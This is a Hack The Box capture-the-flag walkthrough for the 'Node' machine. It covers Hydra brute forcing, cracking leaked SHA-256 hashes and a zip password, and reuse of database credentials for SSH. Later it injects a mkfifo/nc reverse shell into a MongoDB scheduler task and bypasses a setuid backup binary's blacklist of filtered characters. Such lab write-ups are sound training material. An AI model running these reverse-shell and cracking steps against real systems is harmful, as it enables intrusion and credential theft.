Node
Contents
Ports scan
u505@kali:~/HTB/Machines/Node$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.58
Starting masscan 1.0.5 at 2020-05-15 22:13:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.58 Discovered open port 3000/tcp on 10.10.10.58
u505@kali:~/HTB/Machines/Node$ nmap -sC -sV 10.10.10.58 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:13 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.31 seconds u505@kali:~/HTB/Machines/Node$ nmap -sC -sV -Pn 10.10.10.58 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:15 EDT Nmap scan report for node.htb (10.10.10.58) Host is up (0.038s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA) | 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA) |_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519) 3000/tcp open hadoop-tasktracker Apache Hadoop | hadoop-datanode-info: |_ Logs: /login | hadoop-tasktracker-info: |_ Logs: /login |_http-title: MyPlace Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.41 seconds
Web Enumeration
We have 3 users on the front page.
Dirsearch
u505@kali:~/HTB/Machines/Node$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,js" -r -R 4 -f -t 1000 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://node.htb:3000
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html, js | HTTP method: get | Threads: 1000 | Wordlist size: 18379 | Recursion level: 4
Error Log: /opt/utils/dirsearch/logs/errors-20-05-15_18-35-40.log
Target: http://node.htb:3000
[18:35:40] Starting:
Task Completed
Dirsearch is unable to enumerate pages. But after a few tests, we see that the login page is presented for all unknown pages.
Brute force login page
We see the message is different, if the user is know. We can deduct that user admin doesn't exists.
u505@kali:~/HTB/Machines/Node$ cat users.txt mark rastating tom
u505@kali:~/HTB/Machines/Node$ hydra -L users.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.10.58 -s 3000 http-post-form "/api/session/authenticate:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:{\"success\"\:false}:H=Content-Type\: application/json" -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 16:30:02
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 64 tasks per 1 server, overall 64 tasks, 28311 login tries (l:3/p:9437), ~443 tries per task
[DATA] attacking http-post-form://10.10.10.58:3000/api/session/authenticate:{"username"\:"^USER^","password"\:"^PASS^"}:{"success"\:false}:H=Content-Type\: application/json
[3000][http-post-form] host: 10.10.10.58 login: mark password: snowflake
[STATUS] 17858.00 tries/min, 17858 tries in 00:01h, 10453 to do in 00:01h, 64 active
[3000][http-post-form] host: 10.10.10.58 login: tom password: spongebob
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 16:31:09
We found 2 password out of 3.
But they are useless.
User hashes
There is an API users.
We see the users, and password hashes.
If we go back a folder, we retreive the full list of users with hashes and role. We find an admin user.
u505@kali:~/HTB/Machines/Node$ curl http://node.htb:3000/api/users/ | python -m json.tool
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 611 100 611 0 0 7833 0 --:--:-- --:--:-- --:--:-- 7833
[
{
"_id": "59a7365b98aa325cc03ee51c",
"is_admin": true,
"password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
"username": "myP14ceAdm1nAcc0uNT"
},
{
"_id": "59a7368398aa325cc03ee51d",
"is_admin": false,
"password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
"username": "tom"
},
{
"_id": "59a7368e98aa325cc03ee51e",
"is_admin": false,
"password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
"username": "mark"
},
{
"_id": "59aa9781cced6f1d1490fce9",
"is_admin": false,
"password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
"username": "rastating"
}
]
We list users and hashes.
u505@kali:~/HTB/Machines/Node$ cat apiuser.hash myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240 mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73 rastating:5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0
We try to dictionary brute force them.
u505@kali:~/HTB/Machines/Node$ hashid dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Analyzing 'dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)
It seems taht hashes are SHA-256.
u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v5.1.0) starting... ... u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
We found 3 out of 4 passwords, but we found the admin password.
Log with admin user
We log with admin user.
This time there is a Download Backup button.
u505@kali:~/HTB/Machines/Node$ file myplace.backup myplace.backup: ASCII text, with very long lines, with no line terminators
u505@kali:~/HTB/Machines/Node$ head myplace.backup UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNlL1VUCQADyfyrWTAlv151eAsAAQQAAAAABAAAAABQSwMEFAAJAAgARQEiS0x97zc0EQAAEFMAACEAHAB2YXIvd3d3L215cGxhY2UvcGFja2FnZS1sb2NrLmpzb25VVAkAA9HoqVkwJb9edXgLAAEEAAAAAAQAAAAAgS+Bu1qnEne89oknmXE+3X+Sn7UnLI4PQ9DQ4abEF/C6ytQLOKbSNqVEdn4sgzNcP4tds65V9XBxxs7ZAuAhFHZdvx/BdUxI/8NV+WwWCgU43fR6ZkeEQ9uxY11ezlQ9R0dW4ULw
The file is encoded in base64.
u505@kali:~/HTB/Machines/Node$ cat myplace.backup | base64 -d > myplace.backup.decoded
u505@kali:~/HTB/Machines/Node$ file myplace.backup.decoded
myplace.backup.decoded: Zip archive data, at least v1.0 to extract
u505@kali:~/HTB/Machines/Node$ mv myplace.backup.decoded myplace.backup.decoded.zip
u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive: myplace.backup.decoded.zip
creating: var/www/myplace/
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:
The zip file is encruypted.
u505@kali:~/HTB/Machines/Node$ zip2john myplace.backup.decoded.zip > zip.hash
u505@kali:~/HTB/Machines/Node$ john zip.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.backup.decoded.zip)
1g 0:00:00:00 DONE (2020-05-15 19:34) 50.00g/s 9830Kp/s 9830Kc/s 9830KC/s sandrad..pigglett
Use the "--show" option to display all of the cracked passwords reliably
Session completed
With the password we unzip the zip file.
u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip Archive: myplace.backup.decoded.zip [myplace.backup.decoded.zip] var/www/myplace/package-lock.json password: inflating: var/www/myplace/package-lock.json inflating: var/www/myplace/node_modules/serve-static/README.md inflating: var/www/myplace/node_modules/serve-static/index.js inflating: var/www/myplace/node_modules/serve-static/LICENSE inflating: var/www/myplace/node_modules/serve-static/HISTORY.md inflating: var/www/myplace/node_modules/serve-static/package.json inflating: var/www/myplace/node_modules/utils-merge/README.md inflating: var/www/myplace/node_modules/utils-merge/index.js inflating: var/www/myplace/node_modules/utils-merge/LICENSE ...
Access as mark
u505@kali:~/HTB/Machines/Node/var/www/myplace$ cat app.js
...
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
...
In the file app.js, the access at the MongoDB database is done with user mark and password is in clear text on the source file. We try to ssh with these credentials.
u505@kali:~/HTB/Machines/Node$ ssh mark@node.htb The authenticity of host 'node.htb (10.10.10.58)' can't be established. ECDSA key fingerprint is SHA256:I0Y7EMtrkyc9Z/92jdhXQen2Y8Lar/oqcDNLHn28Hbs. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'node.htb,10.10.10.58' (ECDSA) to the list of known hosts. mark@node.htb's password:
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
.-. .-'``(|||) ,`\ \ `-`. 88 88 / \ '``-. ` 88 88 .-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88 (:::) : ___ 88 88 88 88 88 88 88 88 88 88 88 `-` ` , : 88 88 88 88 88 88 88 88 88 88 88 \ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88 `./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888' `-..-( ) `-`
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
Pivot to user Tom
Even before running enumeration scripts, we can easily notice that tom is running 2 processes.
mark@node:~$ ps -ef | grep tom
tom 1225 1 0 May15 ? 00:00:35 /usr/bin/node /var/www/myplace/app.js
tom 1240 1 0 May15 ? 00:00:02 /usr/bin/node /var/scheduler/app.js
mark 1602 1557 0 00:56 pts/0 00:00:00 grep --color=auto tom
The first one is the public application, but the second seems very interesting because of folder name.
mark@node:~$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
This scheduler executes each 30 seconds the document from the collection task of the database scheduler.
mark@node:~$ ls -l /var/scheduler/app.js -rw-rw-r-- 1 root root 910 Sep 3 2017 /var/scheduler/app.js
We cannot modify the program, but we can access the database.
mark@node:~$ mongo mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
> show collections
tasks
> db.tasks.insertOne({cmd: "touch /tmp/u505"})
{
"acknowledged" : true,
"insertedId" : ObjectId("5ebf2e8080c0e28198b78e14")
}
> db.tasks.count()
1
After a few seconds, the empty file exists
mark@node:/tmp$ ls -l /tmp/u505 -rw-r--r-- 1 tom tom 0 May 16 01:06 /tmp/u505
And the documents doesn't exist anymore.
> db.tasks.count() 0
We raise a listener.
u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
And insert a new document.
> db.tasks.insertOne({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.34 4444 >/tmp/f"})
{
"acknowledged" : true,
"insertedId" : ObjectId("5ebf304c80c0e28198b78e16")
}
> db.tasks.count()
1
After a few seconds the shell opens as tom.
u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.58. Ncat: Connection from 10.10.10.58:49090. /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
tom@node:/$ stty raw -echo stty raw -echo tom@node:/$ id uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
I directly noticed a group named admin with an high number. This group is an homemade admin group.
User flag
As tom we are able to read the user flag.
tom@node:/$ cd tom@node:~$ cat user.txt <USER_FLAG>
Enumeration
Before I ran the enumeration script, I looked on that admin group.
tom@node:~$ find / -gid 1002 2>/dev/null /usr/local/bin/backup tom@node:~$ ls -l /usr/local/bin/backup -rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
There is only one file with this group, ans the file has the setuid flag on as root user. Sure that's our entry point for privileges escalation.
u505@kali:~/HTB/Machines/Node$ scp mark@node.htb:/usr/local/bin/backup ./backupnode mark@node.htb's password: backup 100% 16KB 207.7KB/s 00:00
Copy the file locally for analysis in depth.
Program analysis
Here is Node backup main decompilation.
And the flow of the main function.
There is a call at displayTarget
void displayTarget(char *param_1)
{ char local_200 [508];
strcpy(local_200,param_1); printf(" %s[+]%s Starting archiving %s\n",&DAT_08049359,&DAT_08049340,local_200); return; }
The likelihood of buffer overflow in function displayTarget is very high. The strcpy copy the value of the parameter in the local variable, without any control. And this function is called from the main function with the third parameter.
Key file
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[!] Could not open file
As expected, with 3 arguments, the program try to open a file to compare the second argument with the token contained in the file. The way to obtain the file name is very blurry in the decompiled code, to check the value of the variables, we launch a ltrace to see the filename.
u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 2 3
__libc_start_main(0x80489fd, 4, 0xff9dae54, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("1", "-q") = 1
puts("\n\n\n ________________"...
____________________________________________________
) = 69
puts(" / "... / \
) = 67
puts(" | ________________"... | _____________________________________________ |
) = 68
puts(" | | "... | | | |
) = 68
...
puts("`---._.-------------------------"...`---._.-----------------------------------------------------------------._.---'
) = 82
strncpy(0xff9dad18, "2", 100) = 0xff9dad18
strcpy(0xff9dad01, "/") = 0xff9dad01
strcpy(0xff9dad0d, "/") = 0xff9dad0d
strcpy(0xff9dac97, "/e") = 0xff9dac97
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0
strcpy(0xff9d98e8, "Could not open file\n\n") = 0xff9d98e8
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Could not open file\n\n" [!] Could not open file
) = 37
exit(1 <no return ...>
+++ exited (status 1) +++
From the target server
mark@node:~$ cat /etc/myplace/keys a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
We have valid key list, we copy them in our system.
u505@kali:~/HTB/Machines/Node$ mkdir -p etc/myplace u505@kali:~/HTB/Machines/Node$ vi etc/myplace/keys u505@kali:~/HTB/Machines/Node$ cat etc/myplace/keys a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 u505@kali:~/HTB/Machines/Node$ sudo ln -s /home/u505/HTB/Machines/Node/etc/myplace /etc/myplace u505@kali:~/HTB/Machines/Node$ cat /etc/myplace/keys a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!
Now the program find the key file, and doesn't allow us because the token is not correct.
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving nofolder [!] The target path doesn't exist
This time the token is validated, but the program complains that the folder nofolder doesn't exist.
Not allowed characters
u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder
__libc_start_main(0x80489fd, 4, 0xff970c94, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("1", "-q") = 1
puts("\n\n\n ________________"...
____________________________________________________
) = 69
puts(" / "... / \
) = 67
...
puts("`---._.-------------------------"...`---._.-----------------------------------------------------------------._.---'
) = 82
strncpy(0xff970b58, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff970b58
strcpy(0xff970b41, "/") = 0xff970b41
strcpy(0xff970b4d, "/") = 0xff970b4d
strcpy(0xff970ad7, "/e") = 0xff970ad7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x97d25b0
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x97d25b0) = 0xff9706ef
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x97d25b0) = 0xff9706ef
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
strcpy(0xff96f728, "Validated access token") = 0xff96f728
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Validated access token" [+] Validated access token
) = 38
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0) = 0xff9706ef
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0) = 0
strstr("nofolder", "..") = nil
strstr("nofolder", "/root") = nil
strchr("nofolder", ';') = nil
strchr("nofolder", '&') = nil
strchr("nofolder", '`') = nil
strchr("nofolder", '$') = nil
strchr("nofolder", '|') = nil
strstr("nofolder", "//") = nil
strcmp("nofolder", "/") = 1
strstr("nofolder", "/etc") = nil
strcpy(0xff96f91c, "nofolder") = 0xff96f91c
printf(" %s[+]%s Starting archiving %s\n", "\033[32m", "\033[37m", "nofolder" [+] Starting archiving nofolder
) = 43
strcpy(0xff9704fb, "nofolder") = 0xff9704fb
getpid() = 8639
time(0) = 1590009614
clock(0, 0, 0, 0) = 3247
srand(0x5e3d042d, 0x7243d4de, 0x5e3d042d, 0x804918c) = 0
rand(0, 0, 0, 0) = 0x6a7838b2
sprintf("/tmp/.backup_1786263730", "/tmp/.backup_%i", 1786263730) = 23
sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1786263730", "nofolder") = 73
system("/usr/bin/zip -r -P magicword /tm"... <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 3072
access("/tmp/.backup_1786263730", 0) = -1
strcpy(0xff96f728, "The target path doesn't exist") = 0xff96f728
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "The target path doesn't exist" [!] The target path doesn't exist
) = 45
puts("\n"
) = 2
remove("/tmp/.backup_1786263730") = -1
fclose(0x97d25b0) = 0
+++ exited (status 0) +++
The third argument cannot begin with
- /
or contain
- /root
- ;
- &
- `
- $
- |
- //
- /etc
For example is we try a folder not allowed:
u505@kali:~/HTB/Machines/Node$ ./backupnode abc a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root/
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
